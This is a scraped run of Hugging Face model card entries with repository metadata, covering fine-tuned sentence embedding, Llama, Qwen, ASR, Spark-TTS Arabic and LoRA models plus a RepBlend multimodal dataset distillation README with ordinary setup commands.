- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | Validation Loss | binary-classification-evaluator_cosine_ap |
|:------:|:----:|:-------------:|:---------------:|:-----------------------------------------:|
| 0.0207 | 100 | 0.0203 | - | - |
| 0.0414 | 200 | 0.0079 | - | - |
| 0.0621 | 300 | 0.0032 | - | - |
| 0.0828 | 400 | 0.0018 | - | - |
| 0.1035 | 500 | 0.001 | 0.0007 | 0.9999 |
| 0.1241 | 600 | 0.0007 | - | - |
| 0.1448 | 700 | 0.0005 | - | - |
| 0.1655 | 800 | 0.0006 | - | - |
| 0.1862 | 900 | 0.0004 | - | - |
| 0.2069 | 1000 | 0.0006 | 0.0003 | 1.0000 |
| 0.2276 | 1100 | 0.0005 | - | - |
| 0.2483 | 1200 | 0.0002 | - | - |
| 0.2690 | 1300 | 0.0004 | - | - |
| 0.2897 | 1400 | 0.0004 | - | - |
| 0.3104 | 1500 | 0.0004 | 0.0002 | 1.0000 |
| 0.3311 | 1600 | 0.0002 | - | - |
| 0.3517 | 1700 | 0.0004 | - | - |
| 0.3724 | 1800 | 0.0003 | - | - |
| 0.3931 | 1900 | 0.0002 | - | - |
| 0.4138 | 2000 | 0.0004 | 0.0002 | 1.0000 |
| 0.4345 | 2100 | 0.0001 | - | - |
| 0.4552 | 2200 | 0.0003 | - | - |
| 0.4759 | 2300 | 0.0002 | - | - |
| 0.4966 | 2400 | 0.0004 | - | - |
| 0.5173 | 2500 | 0.0003 | 0.0002 | 0.9999 |
| 0.5380 | 2600 | 0.0001 | - | - |
| 0.5587 | 2700 | 0.0003 | - | - |
| 0.5794 | 2800 | 0.0004 | - | - |
| 0.6000 | 2900 | 0.0002 | - | - |
| 0.6207 | 3000 | 0.0003 | 0.0002 | 1.0000 |
| 0.6414 | 3100 | 0.0003 | - | - |
| 0.6621 | 3200 | 0.0002 | - | - |
| 0.6828 | 3300 | 0.0004 | - | - |
| 0.7035 | 3400 | 0.0003 | - | - |
| 0.7242 | 3500 | 0.0004 | 0.0002 | 1.0000 |
| 0.7449 | 3600 | 0.0002 | - | - |
| 0.7656 | 3700 | 0.0002 | - | - |
| 0.7863 | 3800 | 0.0003 | - | - |
| 0.8070 | 3900 | 0.0003 | - | - |
| 0.8276 | 4000 | 0.0002 | 0.0001 | 1.0000 |
| 0.8483 | 4100 | 0.0002 | - | - |
| 0.8690 | 4200 | 0.0003 | - | - |
| 0.8897 | 4300 | 0.0002 | - | - |
| 0.9104 | 4400 | 0.0003 | - | - |
| 0.9311 | 4500 | 0.0002 | 0.0002 | 1.0000 |
| 0.9518 | 4600 | 0.0001 | - | - |
| 0.9725 | 4700 | 0.0005 | - | - |
| 0.9932 | 4800 | 0.0004 | - | - |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### ContrastiveLoss
```bibtex
@inproceedings{hadsell2006dimensionality,
author={Hadsell, R. and Chopra, S. and LeCun, Y.},
booktitle={2006 IEEE Computer Society Conference on Computer Vision and Pattern Recognition (CVPR'06)},
title={Dimensionality Reduction by Learning an Invariant Mapping},
year={2006},
volume={2},
number={},
pages={1735-1742},
doi={10.1109/CVPR.2006.100}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
thefirstgoku/23SEP_inter_v32_2
|
thefirstgoku
| 2025-09-23T15:13:19Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T15:12:27Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26-gguf
|
dsaedi
| 2025-09-23T15:12:12Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T15:10:46Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
galuis116/d8903828-ba96-481a-adf8-47390d201f08
|
galuis116
| 2025-09-23T15:10:11Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T15:06:15Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: d8903828-ba96-481a-adf8-47390d201f08
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a5bbbac5a2471507_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/d8903828-ba96-481a-adf8-47390d201f08
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a5bbbac5a2471507_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: ab8881fc-876a-4c27-baf1-43fc45edba93
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: ab8881fc-876a-4c27-baf1-43fc45edba93
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# d8903828-ba96-481a-adf8-47390d201f08
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.0889
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.6474 | 0.0003 | 1 | 3.1180 |
| 3.1686 | 0.0010 | 3 | 3.1174 |
| 2.7322 | 0.0019 | 6 | 3.1088 |
| 2.6913 | 0.0029 | 9 | 3.0889 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
SudoInstallAI/Qwen-Image-Edit_GGUF-Workflow
|
SudoInstallAI
| 2025-09-23T15:09:30Z | 0 | 3 | null |
[
"ComfyUI",
"Workflow",
"en",
"base_model:Qwen/Qwen-Image-Edit",
"base_model:finetune:Qwen/Qwen-Image-Edit",
"region:us"
] | null | 2025-08-20T02:39:32Z |
---
language:
- en
base_model:
- Qwen/Qwen-Image-Edit
tags:
- ComfyUI
- Workflow
---
# Qwen Image Edit GGUF Workflow
ComfyUI Workflow for Qwen Image Edit GGUF using Lightx2v 4-step Lightning Lora.
- (23/09) Added the Qwen Image Edit 2509 Multi-image Input Workflow
- (09/08) Added the inpainting version of the workflow to be used with the inpainting LoRa model from Ostris.
[Download the Ostris Inpanting LoRa here](https://huggingface.co/ostris/qwen_image_edit_inpainting)
|
Youseff1987/qwen-3-4b-instruct-2507-translate-2509-lora
|
Youseff1987
| 2025-09-23T15:08:18Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"qwen3",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:08:04Z |
---
base_model: unsloth/qwen3-4b-instruct-2507-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Youseff1987
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-instruct-2507-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
csikasote/mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
|
csikasote
| 2025-09-23T15:08:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"bemgen",
"mms",
"generated_from_trainer",
"base_model:facebook/mms-1b-all",
"base_model:finetune:facebook/mms-1b-all",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] |
automatic-speech-recognition
| 2025-09-23T14:10:40Z |
---
library_name: transformers
license: cc-by-nc-4.0
base_model: facebook/mms-1b-all
tags:
- automatic-speech-recognition
- bemgen
- mms
- generated_from_trainer
model-index:
- name: mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mms-1b-all-bemgen-combined-m25f100-52-DAT-0.9
This model is a fine-tuned version of [facebook/mms-1b-all](https://huggingface.co/facebook/mms-1b-all) on the BEMGEN - BEM dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2762
- Cer: 0.0799
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 4
- seed: 52
- gradient_accumulation_steps: 2
- total_train_batch_size: 16
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 30.0
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Cer |
|:-------------:|:-------:|:----:|:---------------:|:------:|
| 7.5096 | 0.6711 | 100 | 2.8165 | 0.9938 |
| 2.4125 | 1.3423 | 200 | 0.4848 | 0.1492 |
| 1.4033 | 2.0134 | 300 | 0.3584 | 0.1053 |
| 1.2952 | 2.6846 | 400 | 0.3348 | 0.0977 |
| 1.2179 | 3.3557 | 500 | 0.3055 | 0.0878 |
| 1.1866 | 4.0268 | 600 | 0.2916 | 0.0830 |
| 1.1662 | 4.6980 | 700 | 0.2906 | 0.0856 |
| 1.1626 | 5.3691 | 800 | 0.2853 | 0.0818 |
| 1.2508 | 6.0403 | 900 | 0.2824 | 0.0805 |
| 1.2534 | 6.7114 | 1000 | 0.2814 | 0.0801 |
| 1.2901 | 7.3826 | 1100 | 0.2807 | 0.0798 |
| 1.2177 | 8.0537 | 1200 | 0.2762 | 0.0800 |
| 1.13 | 8.7248 | 1300 | 0.2736 | 0.0788 |
| 1.2379 | 9.3960 | 1400 | 0.2718 | 0.0777 |
| 1.0842 | 10.0671 | 1500 | 0.2699 | 0.0765 |
| 1.1996 | 10.7383 | 1600 | 0.2703 | 0.0759 |
| 1.17 | 11.4094 | 1700 | 0.2676 | 0.0746 |
| 1.1867 | 12.0805 | 1800 | 0.2664 | 0.0747 |
| 1.1887 | 12.7517 | 1900 | 0.2692 | 0.0768 |
| 1.1212 | 13.4228 | 2000 | 0.2664 | 0.0755 |
| 1.0755 | 14.0940 | 2100 | 0.2696 | 0.0755 |
### Framework versions
- Transformers 4.53.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.0
|
MrEzzat/Spark_TTS_Arabic
|
MrEzzat
| 2025-09-23T15:07:48Z | 1 | 2 | null |
[
"safetensors",
"text-to-speech",
"en",
"zh",
"ar",
"dataset:MBZUAI/ArVoice",
"dataset:mozilla-foundation/common_voice_17_0",
"arxiv:2503.01710",
"base_model:SparkAudio/Spark-TTS-0.5B",
"base_model:finetune:SparkAudio/Spark-TTS-0.5B",
"license:cc-by-nc-sa-4.0",
"region:us"
] |
text-to-speech
| 2025-09-22T22:47:24Z |
---
license: cc-by-nc-sa-4.0
language:
- en
- zh
- ar
tags:
- text-to-speech
library_tag: spark-tts
base_model:
- SparkAudio/Spark-TTS-0.5B
pipeline_tag: text-to-speech
datasets:
- MBZUAI/ArVoice
- mozilla-foundation/common_voice_17_0
---
## Spark-TTS 🔥
### 👉🏻 [Spark-TTS Demos](https://sparkaudio.github.io/spark-tts/) 👈🏻
### 👉🏻 [Github Repo](https://github.com/SparkAudio/Spark-TTS) 👈🏻
### 👉🏻 [Paper](https://arxiv.org/pdf/2503.01710) 👈🏻
### Overview
Spark-TTS is an advanced text-to-speech system that uses the power of large language models (LLM) for highly accurate and natural-sounding voice synthesis. It is designed to be efficient, flexible, and powerful for both research and production use.
---
<table align="center">
<tr>
<td align="center"><b>Inference Overview of Voice Cloning</b><br><img src="src/figures/infer_voice_cloning.png" width="80%" /></td>
</tr>
<tr>
<td align="center"><b>Inference Overview of Controlled Generation</b><br><img src="src/figures/infer_control.png" width="80%" /></td>
</tr>
</table>
## Install
**Clone and Install**
- Clone the repo
``` sh
git clone https://github.com/SparkAudio/Spark-TTS.git
cd Spark-TTS
```
- Install Conda: please see https://docs.conda.io/en/latest/miniconda.html
- Create Conda env:
``` sh
conda create -n sparktts -y python=3.12
conda activate sparktts
pip install -r requirements.txt
```
**Model Download**
Download via python:
```python
from huggingface_hub import snapshot_download
snapshot_download("MrEzzat/Spark_TTS_Arabic", local_dir="pretrained_models/Spark-TTS-0.5B")
```
Download via git clone:
```sh
mkdir -p pretrained_models
# Make sure you have git-lfs installed (https://git-lfs.com)
git lfs install
git clone https://huggingface.co/MrEzzat/Spark_TTS_Arabic
```
**Basic Usage**
You can simply run the demo with the following commands:
``` sh
cd example
bash infer.sh
```
Alternatively, you can directly execute the following command in the command line to perform inference:
``` sh
python -m cli.inference \
--text "text to synthesis." \
--device 0 \
--save_dir "path/to/save/audio" \
--model_dir pretrained_models/Spark-TTS-0.5B \
--prompt_text "transcript of the prompt audio" \
--prompt_speech_path "path/to/prompt_audio"
```
**UI Usage**
You can start the UI interface by running `python webui.py`, which allows you to perform Voice Cloning and Voice Creation. Voice Cloning supports uploading reference audio or directly recording the audio.
| **Voice Cloning** | **Voice Creation** |
|:-------------------:|:-------------------:|
|  |  |
## Citation
```
@misc{wang2025sparktts,
title={Spark-TTS: An Efficient LLM-Based Text-to-Speech Model with Single-Stream Decoupled Speech Tokens},
author={Xinsheng Wang and Mingqi Jiang and Ziyang Ma and Ziyu Zhang and Songxiang Liu and Linqin Li and Zheng Liang and Qixi Zheng and Rui Wang and Xiaoqin Feng and Weizhen Bian and Zhen Ye and Sitong Cheng and Ruibin Yuan and Zhixian Zhao and Xinfa Zhu and Jiahao Pan and Liumeng Xue and Pengcheng Zhu and Yunlin Chen and Zhifei Li and Xie Chen and Lei Xie and Yike Guo and Wei Xue},
year={2025},
eprint={2503.01710},
archivePrefix={arXiv},
primaryClass={cs.SD},
url={https://arxiv.org/abs/2503.01710},
}
```
|
dsaedi/ESGF-Llama-3.1-8B-Instruct-V0.26
|
dsaedi
| 2025-09-23T15:06:36Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:06:25Z |
---
base_model: unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** dsaedi
- **License:** apache-2.0
- **Finetuned from model :** unsloth/meta-llama-3.1-8b-instruct-unsloth-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
dinolab/blockassist
|
dinolab
| 2025-09-23T15:05:56Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"long feathered wolf",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T01:36:17Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- long feathered wolf
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
tcktbar13122/grun_3
|
tcktbar13122
| 2025-09-23T15:05:14Z | 14 | 0 |
transformers
|
[
"transformers",
"safetensors",
"roberta",
"token-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
token-classification
| 2025-09-19T18:28:19Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
alesiaivanova/Qwen-3b-GRPO-dag-4-sub-v4
|
alesiaivanova
| 2025-09-23T15:03:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"trl",
"grpo",
"arxiv:2402.03300",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T15:01:56Z |
---
library_name: transformers
model_name: Qwen-3b-GRPO-dag-4-sub-v4
tags:
- generated_from_trainer
- trl
- grpo
licence: license
---
# Model Card for Qwen-3b-GRPO-dag-4-sub-v4
This model is a fine-tuned version of [None](https://huggingface.co/None).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="None", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/alesyaivanova/long-horizon-reasoning/runs/jkgv56zg)
This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300).
### Framework versions
- TRL: 0.21.0
- Transformers: 4.55.3
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.4
## Citations
Cite GRPO as:
```bibtex
@article{zhihong2024deepseekmath,
title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}},
author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo},
year = 2024,
eprint = {arXiv:2402.03300},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
xinxin66/RepBlend
|
xinxin66
| 2025-09-23T15:02:00Z | 0 | 1 | null |
[
"arxiv:2505.14705",
"license:mit",
"region:us"
] | null | 2025-09-23T14:00:18Z |
---
license: mit
---
# 🌟 Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation
# NeurIPS 2025
> [Beyond Modality Collapse: Representations Blending for Multimodal Dataset Distillation](https://arxiv.org/pdf/2505.14705?).<br>
> [Xin Zhang](https://zhangxin-xd.github.io/), Ziruo Zhang, [Jiawei Du](https://scholar.google.com/citations?user=WrJKEzEAAAAJ&hl=zh-CN), [Zuozhu Liu](https://person.zju.edu.cn/en/lzz), [Joey Tianyi Zhou](https://joeyzhouty.github.io/) <br>
> Agency for Science, Technology, and Research (ASTAR), Singapore <br>
> National University of Singapore, Singapore <br>
> Zhejiang University, China <br>
## 📖 Introduction
<p align="center">
<img src="imgs/problem.png" alt="problem" title="problem" width="700">
</p>
<p align="justify">
<strong> Multimodal embedding distributions across various distillation methods </strong>:
We extract image and text embeddings from a finetuned CLIP and project them into a shared representation space using DOSNES.
Red triangles and blue circles denote image and text embeddings, respectively.
Left: Embeddings from randomly sampled data in the original dataset exhibit a well-spread and modality-aligned distribution.
Middle: The distilled dataset generated by a sota MDD method (LoRS) leads to Modality Collapse, where image and text embeddings are poorly aligned and concentrated in distinct regions.
Right: Our method effectively mitigates modality collapse, yielding a distribution that better preserves cross-modal alignment and exhibits greater representational diversity.
</p>
## ⚙️ Installation
To get started, follow these instructions to set up the environment and install dependencies.
1. **Clone this repository**:
```bash
git clone https://github.com/zhangxin-xd/RepBlend.git
cd RepBlend
```
2. **Install required packages**:
```
conda create -n RepBlend python=3.10
conda activate RepBlend
pip install -r requirements.txt
```
---
## 🚀 Usage
Here’s how to use RepBlend for Multimodal Dataset Distillation:
First, download the pretrained weights and datasets and place them into their respective folders.
### Pretrained Weights
The checkpoints for all experimental networks are available from their respective official repositories. For convenience, we have also provided them together [🤗 here](https://huggingface.co/xinxin66/RepBlend).
Once downloaded, put them in `distill_utils/checkpoints/`.
### Experimental Datasets
The dataset hase been validated on various benchmarks, you can download from their respective links. Once downloaded, put them in `distill_utils/data/`.
| datasets | links|
|-----|-----|
| Flickr30K | [images](https://www.kaggle.com/datasets/hsankesara/flickr-image-dataset), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend/)|
| COCO | [images](https://cocodataset.org/#download), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend) |
|LLaVA-cc3m|[images](https://github.com/haotian-liu/LLaVA/blob/main/docs/Data.md), [🤗 annotations](https://huggingface.co/xinxin66/RepBlend)|
### Generate Expert Trajectories
You can generate expert trajectories by running the `scripts/buffer.sh`, or alternatively, download our [pre-generated trajectories](🤗 https://huggingface.co/xinxin66/RepBlend) for faster reproduction.
```
bash scripts/buffer.sh
```
### Distill Multimodal Dataset
You can distill multimodal datasets with RepBlend by running `scripts/distill_coco_repblend.sh` and `scripts/distill_flickr_repblend.sh`.
```
bash scripts/distill_coco_repblend.sh
bash scripts/distill_flickr_repblend.sh
```
